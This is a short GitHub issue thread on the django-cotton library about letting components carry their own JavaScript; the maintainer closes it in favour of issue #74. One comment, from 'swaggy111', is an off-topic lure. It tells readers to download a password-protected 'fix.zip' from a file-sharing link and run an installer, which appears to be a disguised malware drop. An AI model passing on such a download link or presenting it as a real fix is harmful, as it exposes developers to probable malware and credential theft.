### ISSUE TITLE
Any plans to be able to include Javascript in components?

### ISSUE THREAD

**Issue by ra-dave** [wrabit/django-cotton#97]
There is at least one Django component library that allows one to have associated Javascript with each component, either in a separate file or even in the html file defining the component.  That would be a really awesome addition.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wrabit** [comment]
Something related to this idea is described in the open issue #74

**Comment by wrabit** [comment]
Closing in favour of #74
